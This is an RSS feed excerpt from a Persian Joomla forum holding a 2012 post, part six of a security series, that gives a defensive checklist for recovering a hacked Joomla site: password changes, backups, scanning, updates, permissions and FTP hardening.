			<td colspan="3" class="attachheader" width="100%" align="center"><b>
			Security-in-joomla(1).pdf</b></td>
		</tr>
		<tr>
			<td class="attachrow" width="15%"><span class="genmed">نوع فا&#1740;ل</span></td>
			<td class="attachrow" width="75%">
			<img src="images/attachtypes/pdf.gif" border="0" alt=".pdf" /></td>
			<td rowspan="3" class="attachrow" width="10%" align="center">
			<a href="attachment.php?aid=4671">
			<img src="images/download.png" alt="" border="0"></a><br>
</td>		</tr>
		<tr>
			<td class="attachrow" width="15%"><span class="genmed">دفعات دانلود</span></td>
			<td class="attachrow" width="75%"><span class="genmed">154</span></td>
		</tr>
		<tr>
			<td class="attachrow" width="15%"><span class="genmed">اندازه</span></td>
			<td class="attachrow" width="75%">816.91 کیلوبایت</td>
		</tr>
	</table>
	<br>
	</head>
	</html>

<!-- end: postbit_attachments_attachment -->]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[امنیت در جوملا - بازیابی سایت (قسمت ششم)]]></title>
			<link>https://forums.parsjoom.ir/thread-7512.html</link>
			<pubDate>Tue, 31 Jul 2012 12:05:51 +0000</pubDate>
			<guid isPermaLink="false">https://forums.parsjoom.ir/thread-7512.html</guid>
			<description><![CDATA[<div style="text-align: center;"><img src="http://www.faedu.ir/wp-content/uploads/2012/07/joomla-security-6-faedu.png" border="0" alt="[تصویر:  joomla-security-6-faedu.png]" /><br />
</div>
<div style="text-align: justify;">
<br />
امنیت در جوملا - بازیابی سایت (قسمت ششم)<br />
<br />
:: بازیابی سایت<br />
<br />
من به این بخش می خوام لفظ " دریافت کمک از راه درست " رو بدم... علتش خیلی سادست، ادامه متن رو بخونید تا متوجه بشید چرا این تصمیم رو دارم<br />
<br />
اگر فکر می کنید وب سایت شما مورد حمله قرار گرفته ، حتماً اولین کاری که می کنید رجوع به فروم های مربوطه مثل پارس جوم هست و ایجاد تاپیکی با عنوان "کمک! سایتم هک شده!" فکر کنم همه ی شما عزیزان با اینچنین تیترهایی آشنایی دارید؟!!! موارد اینچنینی در وهله ی اول به ما میگه که هیچ چیز مهمتر از امنیت سایت نیست.. البته هیچ وقت نمیتونید امنیت سایت رو 100% تضمین بکنید. بنده به عنوان سرممیز سیستم های مدیریت امنیت اطلاعات نیز هیچ گاه نمیتوانم امنیت را برای شخص ، سایت، سازمان، ... تضمین کنم! بگذریم... اگر وارد هر کدوم از این تاپیک ها بشید متوجه میشید که مهمترین عامل هک شدن اینگونه سایت ها، استفاده از نسخه های منسوخ جوملا و همچنین نداشتن بگ آپ صحیح برای بازیابی سایت است. این چیزی است که شما به عنوان مدیر (و یا طراح سایت) می بایست بررسی کنید.<br />
<br />
همچنین برای به روز بودن و آشنایی با جدیدترین حفره های امنیتی بهتون پیشنهاد می کنم در سایت هایی که با همین منظور راه اندازی شدن و مهم ترینشون هم سایت دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
، هر از چند گاهی مراجعه کنید .<br />
<br />
در هر صورت وقتی سایت شما هک شده فکر کنم بهترین موقع برای اینه که شما به بازسازی اصولی سایت خود بپردازید! در زیر به برخی از این اصول و استانداردها نگاهی میندازیم.<br />
<br />
-- تنظیم مجدد کلمه عبور<br />
<br />
برخی از هکرها بعد از نفوذ سایت شما را قفل (آفلاین) می کنند، این راه هم معمولاً زمانی اتفاق میفته که به عنوان مدیر ارشد سایت دسترسی داشته باشید. پس هکر پسورد اصلی (مدیریت ارشد) را دارد، فکر کنم زمانش رسیده که پسورد خودتون رو عوض کنید :دی در مقالات اولیه به صورت مفصل به بخش پسورد و رمز های عبور ایمن پرداختم. فقط نکته ی مهم اینه که ترجیحاً هر چند وقت یکبار رمز عبور خودتون رو تغییر بدید.<br />
<br />
-- فایل های مشکوک<br />
<br />
منظورم از فایل کلاً افزونه هایی است که کسی تایید نکرده و یا گروهی آن را فارسی کردند که مورد تایید نمی باشند. این روش به خصوص برای افزونه هایی که به فارسی ترجمه می شوند زیاد اتفاق افتاده. پیشنهاد من به شما اینه که از افزونه های فارسی منتشر شده در دو سایت Joomina.ir  و ParsJoom.ir استفاده کنید. مدیران این دو تیم نه تنها انسان های با دانش و معلومات زیادی هستند، بلکه از نظر اخلاقی نیز در وب مورد تایید همه ی طراحان و توسعه دهندگان نیز می باشند.<br />
<br />
-- پشتیبان گیری<br />
<br />
استفاده از افزونه هایی که حداقل از دیتابیس شما به صورت برنامه ریزی شده از قبل بک آپ می گیرند و حتی پیشنهاد من به شما اینه که به صورت ماهیانه از کل هاستتون بک آپ بگیرید. تا اونجایی که من اطلاع و شناخت دارم مدیران سرورهای ایرانی بک آپ روزانه، هفتگی و یا ماهیانه را تنها در حد شعار نگه داشتند! واقعاً جای تاسف داره. پس خودتون باید این کار رو بکنید.<br />
<br />
-- به روز نگه داشتن افزونه<br />
<br />
برای این کار هم افزونه هایی که به صورت اتوماتیک تمامی افزونه ها و خود جوملا رو به روز نگه میدارند در وب به وفور یافت می شود.<br />
<br />
فعلاً همین موارد برای زیر ساخت کافیه...<br />
<br />
سایت شما هک شده؟! نیاز به دفع داری؟!<br />
<br />
ببخشید اینقدر تیتر رو ساده نوشتم. ولی درک این موضوع راحت تره! براتون چک لیستی آماده کردم که در زیر میتونید اونو انجام بدید(منظورم بعد از هک شدن و یا موقع ریکاوری کردن سایتتونه)<br />
<br />
قدم اول )  سایت خودتون رو آفلاین کنید. این کار هم از طرق جوملا امکان پذیره و هم از طریق httaccess من بهتون پیشنهاد می کنم روش دوم رو پیش برید. برای این کار هم کافیه کد زیر رو به فایل httaccess  اضافه کنید و هر وقت کارتون تموم شد اونو پاک کنید<br />
<br />
Login into your CPanel and click on Password Protect Directories<br />
<br />
قدم دوم ) اسکن کردن سایت. که برای این کار دو راه براتون وجود داره یا کلی سایتتون رو روی هارد ذخیره کنید و توسط آنتی ویروس اسکن کنید و یا از سایت هایی که کار اسکن آنلاین انجام میدن کمک بگیرید. در زیر اسامی چند سایت معتبر رو براتون میارم<br />
<br />
    دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
<br />
   دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
    این سایت زبان فارسی داره<br />
   دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
<br />
    دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
<br />
    Linux AntiVirus boot cd<br />
    دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
<br />
    دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
<br />
<br />
قدم سوم ) به روز رسانی هسته اصلی جوملا به آخرین نسخه (در هنگام انتشار این مطلب نسخه )<br />
<br />
قدم چهارم ) تماس با مدیریت سرور و اطمینان از اینکه مشکلی از سمت هاست در زمینه امنیت و به روز رسانی های برای شما به وجود نمی آید. چون بعضی از اوقات برخی از افزونه های نیاز به برخی تنظیمات و یا نصب نرم افزاری در سرور را دارند. اطمینان داشته باشید که سرور از جدیدترین و به روزترین این نرم افزارها استفاده می کند.<br />
<br />
قدم پنجم ) لیست جدید ترین به روزرسانی های امنتی جوملا را پیگیری کنید و مطمئن شوید که در حال حاضر این آسیبها شما را تهدید نمی کند<br />
<br />
قدم ششم ) مرور کلیه موارد مهمی که در این سری (کلیه مباحث امنیت در جوملا) براتون مطرح کردم و سعی کنید تا اونجایی که میتونید بهش عمل کنید<br />
<br />
قدم هفتم ) بررسی تمامی رمز های عبور و تغییر آنها به رمز عبوری ایمن<br />
<br />
قدم هشتم ) قالب سایتتون رو در صورتیکه اصل قالب رو دارید به جای قالب فعلی جایگزین کنید (منظورم قالب قبل از هک شدن و قالب فعلی که هک شده رو تمامی فایلهاشو کپی / پیست کنید)<br />
<br />
قدم نهم ) در صورت امکان تمامی فایل های نمایشی اعم از عکس و پی دی اف را دوباره آپلود کنید<br />
<br />
قدم دهم ) بررسی سطوح دسترسی تمامی فایل ها و فولدر های جوملا<br />
<br />
قدم یازدهم ) غیر فعال کردن Anonymous FTP و همچنین ذخیره نکردن مشخصات FTP در بخش مدیریت و همچنین در صورت امکان استفاده از SFTP<br />
<br />
قدم دوازدهم ) بررسی سطح دسترسی فایل Configuration.php<br />
<br />
قدم سیزدهم ) حذف فایل زیپ قالب و یا فایل زیپ بسته های نصب آسان پس از اتمام کار<br />
<br />
قدم چهاردهم ) عوض کردن پسوند جداول دیتابیس . برای این کار می تونید توسط دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
 و  آموزشی که دوست خوبم آقای وحید بندره در دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
 پارس جوم گذاشتند پیش برید<br />
<br />
قدم پانزدهم ) چک کردن سطوح دسترسی ساب فولدر و یا ساب دامنه و همچنین اکانت هایی که به آنها دسترسی دارند.<br />
<br />
به همین راحتی<br />
<br />
سطح مقدماتی امنیت در جوملا به کمک شما عزیزان و لطف پروردگار تموم شد. سعی می کنم در آینده به بررسی دقیق تر مواردی همچون httaccess و apache و .. بپردازم.<br />
<br />
امیدوارم این سری از موارد مورد توجه شما عزیزان واقع شده باشه و هر جا کم و کاستی داشت حتماً اطلاع بدید تا درستش کنم . اطلاعات و دانش بنده به حدی نیست که بتونم مطالب قویتری بنویسم و تنها در حد توان و دانش خود سعی می کنم تا جامعه ی آی تی کشورم رو در راهی که میره همراهی کنم<br />
<br />
منتظر نظرات و پیشنهادات شما عزیزان هستم<br />
<br />
در آخر باید بگم که در حال تدوین کل مطالبی که نوشتم در قالب یک پی دی اف هستم و امیدوارم تا ساعاتی دیگر بتونم اونو منشر کنم<br />
<br />
با آرزوی موفقیت برای شما بزرگواران<br />
<br />
در پناه حق<br />
<br />
مرتضی پورمحمد<br />
<br />
10 مرداد ماه سال 1391<br />
<br />
<br />
=-=-=-= پی نوشت<br />
دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
<br />
** کما فی السابق خدمت عزیزان عرض می کنم بنده فقط و فقط در فروم  پارس جوم به سوالات امنیت جوملای شما عزیزان و به طور کلی مسایل مربوط به جوملا پاسخگو هستم. مرسی از توجهتون<br />
</div>]]></description>
			<content:encoded><![CDATA[<div style="text-align: center;"><img src="http://www.faedu.ir/wp-content/uploads/2012/07/joomla-security-6-faedu.png" border="0" alt="[تصویر:  joomla-security-6-faedu.png]" /><br />
</div>
<div style="text-align: justify;">
<br />
امنیت در جوملا - بازیابی سایت (قسمت ششم)<br />
<br />
:: بازیابی سایت<br />
<br />
من به این بخش می خوام لفظ " دریافت کمک از راه درست " رو بدم... علتش خیلی سادست، ادامه متن رو بخونید تا متوجه بشید چرا این تصمیم رو دارم<br />
<br />
اگر فکر می کنید وب سایت شما مورد حمله قرار گرفته ، حتماً اولین کاری که می کنید رجوع به فروم های مربوطه مثل پارس جوم هست و ایجاد تاپیکی با عنوان "کمک! سایتم هک شده!" فکر کنم همه ی شما عزیزان با اینچنین تیترهایی آشنایی دارید؟!!! موارد اینچنینی در وهله ی اول به ما میگه که هیچ چیز مهمتر از امنیت سایت نیست.. البته هیچ وقت نمیتونید امنیت سایت رو 100% تضمین بکنید. بنده به عنوان سرممیز سیستم های مدیریت امنیت اطلاعات نیز هیچ گاه نمیتوانم امنیت را برای شخص ، سایت، سازمان، ... تضمین کنم! بگذریم... اگر وارد هر کدوم از این تاپیک ها بشید متوجه میشید که مهمترین عامل هک شدن اینگونه سایت ها، استفاده از نسخه های منسوخ جوملا و همچنین نداشتن بگ آپ صحیح برای بازیابی سایت است. این چیزی است که شما به عنوان مدیر (و یا طراح سایت) می بایست بررسی کنید.<br />
<br />
همچنین برای به روز بودن و آشنایی با جدیدترین حفره های امنیتی بهتون پیشنهاد می کنم در سایت هایی که با همین منظور راه اندازی شدن و مهم ترینشون هم سایت دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
، هر از چند گاهی مراجعه کنید .<br />
<br />
در هر صورت وقتی سایت شما هک شده فکر کنم بهترین موقع برای اینه که شما به بازسازی اصولی سایت خود بپردازید! در زیر به برخی از این اصول و استانداردها نگاهی میندازیم.<br />
<br />
-- تنظیم مجدد کلمه عبور<br />
<br />
برخی از هکرها بعد از نفوذ سایت شما را قفل (آفلاین) می کنند، این راه هم معمولاً زمانی اتفاق میفته که به عنوان مدیر ارشد سایت دسترسی داشته باشید. پس هکر پسورد اصلی (مدیریت ارشد) را دارد، فکر کنم زمانش رسیده که پسورد خودتون رو عوض کنید :دی در مقالات اولیه به صورت مفصل به بخش پسورد و رمز های عبور ایمن پرداختم. فقط نکته ی مهم اینه که ترجیحاً هر چند وقت یکبار رمز عبور خودتون رو تغییر بدید.<br />
<br />
-- فایل های مشکوک<br />
<br />
منظورم از فایل کلاً افزونه هایی است که کسی تایید نکرده و یا گروهی آن را فارسی کردند که مورد تایید نمی باشند. این روش به خصوص برای افزونه هایی که به فارسی ترجمه می شوند زیاد اتفاق افتاده. پیشنهاد من به شما اینه که از افزونه های فارسی منتشر شده در دو سایت Joomina.ir  و ParsJoom.ir استفاده کنید. مدیران این دو تیم نه تنها انسان های با دانش و معلومات زیادی هستند، بلکه از نظر اخلاقی نیز در وب مورد تایید همه ی طراحان و توسعه دهندگان نیز می باشند.<br />
<br />
-- پشتیبان گیری<br />
<br />
استفاده از افزونه هایی که حداقل از دیتابیس شما به صورت برنامه ریزی شده از قبل بک آپ می گیرند و حتی پیشنهاد من به شما اینه که به صورت ماهیانه از کل هاستتون بک آپ بگیرید. تا اونجایی که من اطلاع و شناخت دارم مدیران سرورهای ایرانی بک آپ روزانه، هفتگی و یا ماهیانه را تنها در حد شعار نگه داشتند! واقعاً جای تاسف داره. پس خودتون باید این کار رو بکنید.<br />
<br />
-- به روز نگه داشتن افزونه<br />
<br />
برای این کار هم افزونه هایی که به صورت اتوماتیک تمامی افزونه ها و خود جوملا رو به روز نگه میدارند در وب به وفور یافت می شود.<br />
<br />
فعلاً همین موارد برای زیر ساخت کافیه...<br />
<br />
سایت شما هک شده؟! نیاز به دفع داری؟!<br />
<br />
ببخشید اینقدر تیتر رو ساده نوشتم. ولی درک این موضوع راحت تره! براتون چک لیستی آماده کردم که در زیر میتونید اونو انجام بدید(منظورم بعد از هک شدن و یا موقع ریکاوری کردن سایتتونه)<br />
<br />
قدم اول )  سایت خودتون رو آفلاین کنید. این کار هم از طرق جوملا امکان پذیره و هم از طریق httaccess من بهتون پیشنهاد می کنم روش دوم رو پیش برید. برای این کار هم کافیه کد زیر رو به فایل httaccess  اضافه کنید و هر وقت کارتون تموم شد اونو پاک کنید<br />
<br />
Login into your CPanel and click on Password Protect Directories<br />
<br />
قدم دوم ) اسکن کردن سایت. که برای این کار دو راه براتون وجود داره یا کلی سایتتون رو روی هارد ذخیره کنید و توسط آنتی ویروس اسکن کنید و یا از سایت هایی که کار اسکن آنلاین انجام میدن کمک بگیرید. در زیر اسامی چند سایت معتبر رو براتون میارم<br />
<br />
    دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
<br />
   دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
    این سایت زبان فارسی داره<br />
   دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
<br />
    دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
<br />
    Linux AntiVirus boot cd<br />
    دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
<br />
    دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
<br />
<br />
قدم سوم ) به روز رسانی هسته اصلی جوملا به آخرین نسخه (در هنگام انتشار این مطلب نسخه )<br />
<br />
قدم چهارم ) تماس با مدیریت سرور و اطمینان از اینکه مشکلی از سمت هاست در زمینه امنیت و به روز رسانی های برای شما به وجود نمی آید. چون بعضی از اوقات برخی از افزونه های نیاز به برخی تنظیمات و یا نصب نرم افزاری در سرور را دارند. اطمینان داشته باشید که سرور از جدیدترین و به روزترین این نرم افزارها استفاده می کند.<br />
<br />
قدم پنجم ) لیست جدید ترین به روزرسانی های امنتی جوملا را پیگیری کنید و مطمئن شوید که در حال حاضر این آسیبها شما را تهدید نمی کند<br />
<br />
قدم ششم ) مرور کلیه موارد مهمی که در این سری (کلیه مباحث امنیت در جوملا) براتون مطرح کردم و سعی کنید تا اونجایی که میتونید بهش عمل کنید<br />
<br />
قدم هفتم ) بررسی تمامی رمز های عبور و تغییر آنها به رمز عبوری ایمن<br />
<br />
قدم هشتم ) قالب سایتتون رو در صورتیکه اصل قالب رو دارید به جای قالب فعلی جایگزین کنید (منظورم قالب قبل از هک شدن و قالب فعلی که هک شده رو تمامی فایلهاشو کپی / پیست کنید)<br />
<br />
قدم نهم ) در صورت امکان تمامی فایل های نمایشی اعم از عکس و پی دی اف را دوباره آپلود کنید<br />
<br />
قدم دهم ) بررسی سطوح دسترسی تمامی فایل ها و فولدر های جوملا<br />
<br />
قدم یازدهم ) غیر فعال کردن Anonymous FTP و همچنین ذخیره نکردن مشخصات FTP در بخش مدیریت و همچنین در صورت امکان استفاده از SFTP<br />
<br />
قدم دوازدهم ) بررسی سطح دسترسی فایل Configuration.php<br />
<br />
قدم سیزدهم ) حذف فایل زیپ قالب و یا فایل زیپ بسته های نصب آسان پس از اتمام کار<br />
<br />
قدم چهاردهم ) عوض کردن پسوند جداول دیتابیس . برای این کار می تونید توسط دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
 و  آموزشی که دوست خوبم آقای وحید بندره در دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
 پارس جوم گذاشتند پیش برید<br />
<br />
قدم پانزدهم ) چک کردن سطوح دسترسی ساب فولدر و یا ساب دامنه و همچنین اکانت هایی که به آنها دسترسی دارند.<br />
<br />
به همین راحتی<br />
<br />
سطح مقدماتی امنیت در جوملا به کمک شما عزیزان و لطف پروردگار تموم شد. سعی می کنم در آینده به بررسی دقیق تر مواردی همچون httaccess و apache و .. بپردازم.<br />
<br />
امیدوارم این سری از موارد مورد توجه شما عزیزان واقع شده باشه و هر جا کم و کاستی داشت حتماً اطلاع بدید تا درستش کنم . اطلاعات و دانش بنده به حدی نیست که بتونم مطالب قویتری بنویسم و تنها در حد توان و دانش خود سعی می کنم تا جامعه ی آی تی کشورم رو در راهی که میره همراهی کنم<br />
<br />
منتظر نظرات و پیشنهادات شما عزیزان هستم<br />
<br />
در آخر باید بگم که در حال تدوین کل مطالبی که نوشتم در قالب یک پی دی اف هستم و امیدوارم تا ساعاتی دیگر بتونم اونو منشر کنم<br />
<br />
با آرزوی موفقیت برای شما بزرگواران<br />
<br />
در پناه حق<br />
<br />
مرتضی پورمحمد<br />
<br />
10 مرداد ماه سال 1391<br />
<br />
<br />
=-=-=-= پی نوشت<br />
دیدن لینک ها برای شما امکان پذیر نیست. لطفا <a href="https://forums.parsjoom.ir/member.php?action=register">ثبت نام کنید</a> یا <a href="https://forums.parsjoom.ir/member.php?action=login">وارد حساب خود شوید</a> تا بتوانید لینک ها را ببینید.<br />
<br />
** کما فی السابق خدمت عزیزان عرض می کنم بنده فقط و فقط در فروم  پارس جوم به سوالات امنیت جوملای شما عزیزان و به طور کلی مسایل مربوط به جوملا پاسخگو هستم. مرسی از توجهتون<br />
</div>]]></content:encoded>
		</item>
	</channel>
</rss>